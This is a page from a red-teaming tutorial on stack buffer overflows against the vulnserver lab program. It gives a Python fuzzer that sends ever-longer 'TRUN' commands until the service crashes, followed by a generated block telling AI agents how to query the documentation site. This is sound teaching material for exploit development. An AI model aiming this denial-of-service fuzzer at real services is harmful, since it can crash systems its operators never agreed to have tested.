# Step 1: Fuzzing

Restart vulnserver by pressing Ctrl+F2 in Immunity Debugger and then run it by pressing F9. Run the fuzzer to crash the executable's `TRUN` command:

{% code title="fuzzer.py" %}

```python
#!/usr/bin/python3
import sys, socket
from time import sleep

#--------Changeme--------#
                         #
host = "192.168.1.2"     #
port = 9999              #
                         #
#------------------------#

buffer = b"A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))

        payload = b"TRUN /.:/" + buffer

        print(f"[+] Sending the payload of length {len(buffer)}...")
        s.send(payload)
        s.close()

        sleep(1)
        buffer += b"A" * 100

    except:
        print(f"Fuzzer crashed at {len(buffer)} bytes")
        sys.exit()
```

{% endcode %}

Here we should manually encode everything with `b""` instead of using `.encode()` since `.encode()` turns a byte into its Unicode representation:

![Unicode](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MgHb_2EbeRRpJ4Xwqoj%2F-MgHdTwSVXSvKcWzA5Ry%2Fimage.png?alt=media\&token=4c6fd056-6137-4f26-a94f-4cbb6ba81fef)

After a while, vulnserver crashes:

![Crash](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MgCpzpGWQmGqKiV27Fl%2F-MgCq56bHAt8aQcu_uGS%2Fimage.png?alt=media\&token=a47fc0c4-99ec-401e-92f2-19ebf0a4ceb3)

Here we learn that the offset is less than 3000 bytes. We only want to know an approximate value in this step, and we will figure out the exact offset in the next step.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfnote/red-teaming/buffer-overflow/step-1-fuzzing.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.